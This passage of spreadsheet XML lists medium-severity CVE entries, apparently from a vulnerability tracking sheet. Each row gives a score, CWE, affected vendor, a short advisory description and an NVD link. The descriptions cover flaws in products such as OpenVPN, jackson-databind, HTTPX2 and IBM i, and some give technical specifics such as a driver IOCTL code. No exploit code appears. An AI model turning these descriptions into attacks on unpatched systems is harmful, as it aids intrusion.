      <c r="A1739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88035</t>
        </is>
      </c>
      <c r="C1739" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D1739" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1739" s="5" t="inlineStr"/>
      <c r="F1739" s="5" t="inlineStr"/>
      <c r="G1739" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1739" s="5" t="inlineStr"/>
      <c r="I1739" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1739" s="5" t="inlineStr"/>
      <c r="K1739" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1739" s="5" t="inlineStr">
        <is>
          <t>A size check in the client-side authentication path of the MongoDB C Driver can wrap around, so an unusually large user-name value is accepted and copied past the end of a small buffer. A party able to set the driver's connection settings may cause the application that embeds the driver to terminate unexpectedly. Reaching this code requires a build in which the optional external SASL authentication backend is present and a connection configured to use it.</t>
        </is>
      </c>
      <c r="M1739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88035</t>
        </is>
      </c>
    </row>
    <row r="1740">
      <c r="A1740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0293</t>
        </is>
      </c>
      <c r="C1740" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1740" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1740" s="5" t="inlineStr"/>
      <c r="F1740" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1740" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, palo alto</t>
        </is>
      </c>
      <c r="H1740" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I1740" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1740" s="5" t="inlineStr"/>
      <c r="K1740" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1740" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Palo Alto Networks Prisma® Access Agent on Windows enables a local attacker with administrator privileges to bypass the anti-tamper protection, enabling unauthorized access to protected processes and files.
The Prisma Access Agent on Linux, macOS, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M1740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0293</t>
        </is>
      </c>
    </row>
    <row r="1741">
      <c r="A1741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69832</t>
        </is>
      </c>
      <c r="C1741" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1741" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1741" s="5" t="inlineStr"/>
      <c r="F1741" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1741" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1741" s="5" t="inlineStr"/>
      <c r="I1741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1741" s="5" t="inlineStr"/>
      <c r="K1741" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1741" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t>
        </is>
      </c>
    </row>
    <row r="1742">
      <c r="A1742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73647</t>
        </is>
      </c>
      <c r="C1742" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1742" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1742" s="5" t="inlineStr"/>
      <c r="F1742" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1742" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1742" s="5" t="inlineStr"/>
      <c r="I1742" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1742" s="5" t="inlineStr"/>
      <c r="K1742" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1742" s="5" t="inlineStr">
        <is>
          <t>Quasar Framework is a framework for building high-performance Vue.js user interfaces. Prior to 2.22.0, the public extend() utility in ui/src/utils/extend/extend.js recursively copied attacker-controlled object keys during extend(true, target, source) deep merges without rejecting an own __proto__ property. The merge could descend into the prototype object and write attacker-controlled properties to Object.prototype in the same JavaScript process. Applications that passed user-controlled or partially user-controlled objects to extend() could experience logic bypass, unsafe default-option injection, denial of service, or other application-specific impact when polluted properties were later consumed. This issue is fixed in version 2.22.0.</t>
        </is>
      </c>
      <c r="M1742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73647</t>
        </is>
      </c>
    </row>
    <row r="1743">
      <c r="A1743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78043</t>
        </is>
      </c>
      <c r="C1743" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1743" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1743" s="5" t="inlineStr"/>
      <c r="F1743" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1743" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1743" s="5" t="inlineStr"/>
      <c r="I1743" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1743" s="5" t="inlineStr"/>
      <c r="K1743" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1743" s="5" t="inlineStr">
        <is>
          <t>The Windows Interactive Service in OpenVPN 2.7_alpha1 through 2.7.6 allows local authenticated users to bypass the trusted configuration directory constraint and load arbitrary configuration files via specially crafted paths</t>
        </is>
      </c>
      <c r="M1743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78043</t>
        </is>
      </c>
    </row>
    <row r="1744">
      <c r="A1744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78629</t>
        </is>
      </c>
      <c r="C1744" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1744" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1744" s="5" t="inlineStr"/>
      <c r="F1744" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1744" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1744" s="5" t="inlineStr"/>
      <c r="I1744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1744" s="5" t="inlineStr"/>
      <c r="K1744" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="L1744" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive agent plugin returns a success response without a signed SAML assertion when the organization's policy requires no MFA for a given user. The response contains only a bare boolean validation indicator with no cryptographic artifact, resulting in an unverifiable authentication verdict being delivered to the relying application.</t>
        </is>
      </c>
      <c r="M1744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t>
        </is>
      </c>
    </row>
    <row r="1745">
      <c r="A1745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81830</t>
        </is>
      </c>
      <c r="C1745" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1745" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1745" s="5" t="inlineStr"/>
      <c r="F1745" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1745" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1745" s="5" t="inlineStr"/>
      <c r="I1745" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1745" s="5" t="inlineStr"/>
      <c r="K1745" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1745" s="5" t="inlineStr">
        <is>
          <t>The Windows interactive service in OpenVPN 2.4.0 through 2.6.22 allows local authenticated users to bypass the trusted configuration directory constraint via incorrect file path validation</t>
        </is>
      </c>
      <c r="M1745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81830</t>
        </is>
      </c>
    </row>
    <row r="1746">
      <c r="A1746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83557</t>
        </is>
      </c>
      <c r="C1746" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1746" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1746" s="5" t="inlineStr"/>
      <c r="F1746" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1746" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1746" s="5" t="inlineStr"/>
      <c r="I1746" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1746" s="5" t="inlineStr"/>
      <c r="K1746" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-915</t>
        </is>
      </c>
      <c r="L1746" s="5" t="inlineStr">
        <is>
          <t>DefaultBaseTypeLimitingValidator is the PolymorphicTypeValidator applied automatically whenever @JsonTypeInfo is used without an explicitly configured custom validator. It denies polymorphic resolution only for a fixed set of "unsafe base types", and its isSafeSubType method returns true unconditionally for every base type outside that set. java.lang.Comparable was absent from the list despite being implemented by a very large fraction of JDK and application classes, comparable in breadth to java.io.Serializable, which is on the list for that reason. An application declaring an @JsonTypeInfo-annotated property or class with Comparable as its base type, and no custom PolymorphicTypeValidator, will accept a type identifier for essentially any class implementing Comparable. This yields an attacker-controlled object instantiation primitive; a demonstrated case constructs a java.io.File for an arbitrary attacker-chosen path, which becomes path-traversal-adjacent if the application subsequently calls path-sensitive methods on the value. No class implementing Comparable has been identified that yields code execution through deserialization alone. Global Default Typing via activateDefaultTyping is not affected, because that method structurally requires an explicit PolymorphicTypeValidator argument. This affects com.fasterxml.jackson.core:jackson-databind from 2.11.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2.</t>
        </is>
      </c>
      <c r="M1746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t>
        </is>
      </c>
    </row>
    <row r="1747">
      <c r="A1747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84380</t>
        </is>
      </c>
      <c r="C1747" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D1747" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1747" s="5" t="inlineStr"/>
      <c r="F1747" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1747" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1747" s="5" t="inlineStr"/>
      <c r="I1747" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1747" s="5" t="inlineStr"/>
      <c r="K1747" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L1747" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.11.0, Request._prepare() in src/httpx2/httpx2/_models.py can add a body-derived Content-Length header to a request that already contains a caller-supplied Transfer-Encoding header because its setdefault() processing checks each default header independently rather than treating the two framing headers as mutually exclusive. Fixed-size byte, JSON, form, and known-length multipart bodies can therefore be serialized over HTTP/1.1 with both headers, allowing request smuggling or connection desynchronization when downstream intermediaries disagree about which framing header takes precedence. This issue is fixed in version 2.11.0.</t>
        </is>
      </c>
      <c r="M1747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t>
        </is>
      </c>
    </row>
    <row r="1748">
      <c r="A1748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1748" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48651</t>
        </is>
      </c>
      <c r="C1748" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1748" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1748" s="5" t="inlineStr"/>
      <c r="F1748" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1748" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1748" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I1748" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J1748" s="5" t="inlineStr"/>
      <c r="K1748" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1748" s="5" t="inlineStr">
        <is>
          <t>In importWrappedKey of KMKeymasterApplet.java, there is a possible way access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48651</t>
        </is>
      </c>
    </row>
    <row r="1749">
      <c r="A1749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1749" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51619</t>
        </is>
      </c>
      <c r="C1749" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1749" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1749" s="5" t="inlineStr"/>
      <c r="F1749" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1749" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1749" s="5" t="inlineStr"/>
      <c r="I1749" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1749" s="5" t="inlineStr"/>
      <c r="K1749" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1749" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Thesycon DPC Latency Checker driver (dpc.sys) thru 1.4.0 allows local unprivileged users to cause a denial-of-service (BSOD) condition on Windows systems. The driver exposes an IOCTL interface (0x81772008) that accepts user-controlled input without validating pointers before passing them to kernel APIs. Specifically, it dereferences a user-supplied pointer and uses the resulting value in a call to ExSetTimerResolution, leading to an arbitrary kernel memory access. Exploiting this flaw results in a system crash.</t>
        </is>
      </c>
      <c r="M1749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51619</t>
        </is>
      </c>
    </row>
    <row r="1750">
      <c r="A1750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0636</t>
        </is>
      </c>
      <c r="C1750" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1750" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1750" s="5" t="inlineStr"/>
      <c r="F1750" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1750" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1750" s="5" t="inlineStr"/>
      <c r="I1750" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J1750" s="5" t="inlineStr"/>
      <c r="K1750" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="L1750" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an LDAP query ('LDAP injection') vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (prov modules).
 This vulnerability is associated with program files LDAPStoreHelper.
This issue affects BC-JAVA: from 1.74 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M1750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0636</t>
        </is>
      </c>
    </row>
    <row r="1751">
      <c r="A1751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16689</t>
        </is>
      </c>
      <c r="C1751" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1751" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1751" s="5" t="inlineStr"/>
      <c r="F1751" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1751" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1751" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1751" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1751" s="5" t="inlineStr"/>
      <c r="K1751" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1751" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to improper logging of credentials.</t>
        </is>
      </c>
      <c r="M1751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16689</t>
        </is>
      </c>
    </row>
    <row r="1752">
      <c r="A1752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17270</t>
        </is>
      </c>
      <c r="C1752" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1752" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1752" s="5" t="inlineStr"/>
      <c r="F1752" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1752" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1752" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1752" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1752" s="5" t="inlineStr"/>
      <c r="K1752" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1752" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to cause a denial of service due to a stack-based buffer overflow.</t>
        </is>
      </c>
      <c r="M1752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17270</t>
        </is>
      </c>
    </row>
    <row r="1753">
      <c r="A1753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17440</t>
        </is>
      </c>
      <c r="C1753" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1753" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1753" s="5" t="inlineStr"/>
      <c r="F1753" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1753" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1753" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1753" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1753" s="5" t="inlineStr"/>
      <c r="K1753" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1753" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to cause a denial of service due to uncontrolled recursion.</t>
        </is>
      </c>
      <c r="M1753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17440</t>
        </is>
      </c>
    </row>
    <row r="1754">
      <c r="A1754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17442</t>
        </is>
      </c>
      <c r="C1754" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1754" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1754" s="5" t="inlineStr"/>
      <c r="F1754" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1754" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1754" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1754" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1754" s="5" t="inlineStr"/>
      <c r="K1754" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1754" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to credentials being written to trace logs in cleartext.</t>
        </is>
      </c>
      <c r="M1754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17442</t>
        </is>
      </c>
    </row>
    <row r="1755">
      <c r="A1755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17469</t>
        </is>
      </c>
      <c r="C1755" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1755" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1755" s="5" t="inlineStr"/>
      <c r="F1755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1755" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1755" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1755" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1755" s="5" t="inlineStr"/>
      <c r="K1755" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="L1755" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to cause a denial of service due to an off-by-one write in the LPD queue name parser.</t>
        </is>
      </c>
      <c r="M1755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17469</t>
        </is>
      </c>
    </row>
    <row r="1756">
      <c r="A1756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18622</t>
        </is>
      </c>
      <c r="C1756" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1756" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1756" s="5" t="inlineStr"/>
      <c r="F1756" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1756" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1756" s="5" t="inlineStr">
        <is>
          <t>apple:macos, foxit:pdf_editor, foxit:pdf_reader, microsoft:windows</t>
        </is>
      </c>
      <c r="I1756" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1756" s="5" t="inlineStr"/>
      <c r="K1756" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L1756" s="5" t="inlineStr">
        <is>
          <t>Foxit PDF Editor/Reader inconsistently alerts users when signature fields are abnormally modified, including alterations to appearance, coordinates, or field duplication. This may mislead users into trusting tampered documents, since the UI cannot accurately reflect the actual integrity status of signatures.</t>
        </is>
      </c>
      <c r="M1756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18622</t>
        </is>
      </c>
    </row>
    <row r="1757">
      <c r="A1757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18858</t>
        </is>
      </c>
      <c r="C1757" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1757" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1757" s="5" t="inlineStr"/>
      <c r="F1757" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1757" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1757" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1757" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1757" s="5" t="inlineStr"/>
      <c r="K1757" s="5" t="inlineStr">
        <is>
          <t>CWE-267</t>
        </is>
      </c>
      <c r="L1757" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, and 7.5 could allow a local authenticated attacker to obtain information from a privileged file when using SSH.</t>
        </is>
      </c>
      <c r="M1757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18858</t>
        </is>
      </c>
    </row>
    <row r="1758">
      <c r="A1758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19649</t>
        </is>
      </c>
      <c r="C1758" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1758" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1758" s="5" t="inlineStr"/>
      <c r="F1758" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1758" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1758" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1758" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1758" s="5" t="inlineStr"/>
      <c r="K1758" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1758" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to improper logging of database credentials.</t>
        </is>
      </c>
      <c r="M1758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19649</t>
        </is>
      </c>
    </row>
    <row r="1759">
      <c r="A1759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24049</t>
        </is>
      </c>
      <c r="C1759" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1759" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1759" s="5" t="inlineStr"/>
